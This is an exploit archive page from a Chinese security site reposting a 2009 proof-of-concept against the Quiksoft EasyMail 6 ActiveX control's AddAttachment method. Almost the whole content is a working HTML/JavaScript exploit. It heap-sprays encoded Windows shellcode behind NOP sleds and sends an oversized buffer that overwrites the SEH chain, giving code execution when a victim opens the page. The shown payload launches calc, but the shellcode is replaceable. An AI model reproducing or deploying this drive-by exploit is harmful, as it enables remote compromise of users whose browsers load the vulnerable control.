首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
来源:www.bmgsec.com.au 作者:bmgsec 发布时间:2009-09-18  

<html>
 <head>
    <!--
      -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
      --
      -- Its old and the latest version doesn't support this method.
      -- I was bored and a similar post sparked my interest.
      --
      -- Advisory: http://www.bmgsec.com.au/advisory/48/
      --
      -- Written by:
      -- bmgsec (bmgsec [at] gmail.com / www.bmgsec.com.au)
      --  -->
 <title>Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit</title>
<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'></object>
<script language='javascript'>
       function str_repeat ( input, multiplier ) {
               return new Array(multiplier+1).join(input);
       }

       //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH
       shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb"+
                            "%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196"+
                            "%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2"+
                            "%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb"+
                            "%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56"+
                            "%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed"+
                            "%u7114%u569b%u7173%u057b%ue11a%ucae7");

       bigblock = unescape("%u9090%u9090");
       headersize = 20;
       slackspace = headersize + shellcode.length;

       while (bigblock.length < slackspace)
               bigblock += bigblock;

       fillblock = bigblock.substring(0, slackspace);
       block = bigblock.substring(0, bigblock.length - slackspace);

       while (block.length + slackspace < 200000)
               block = block + block + fillblock;

       memory = new Array();
       for (i=0; i<500; i++)
               memory[i] = block + shellcode;

       buffer = str_repeat('A', 433);
       buffer += "BBBB";
       buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63);

       test.AddAttachment(buffer, 1);
</script>
</head>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quiksoft EasyMail 6.0.3.0 imap
·Ease Audio Cutter 1.20 (.wav f
·Notepad++ 5.4.5 Local .C/CPP S
·Joomla Component com_jreservat
·Saphplesson 4.3 Remote Blind S
·Apple Safari 4.0.3 null pointe
·Joomla Component com_jlord_rss
·BigAnt Server 2.50 SP1 (ZIP Fi
·Joomla Album component version
·Charm Real Converter Pro versi
·Soritong MP3 Player version 1.
·InstantGet version 2.08 Active
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved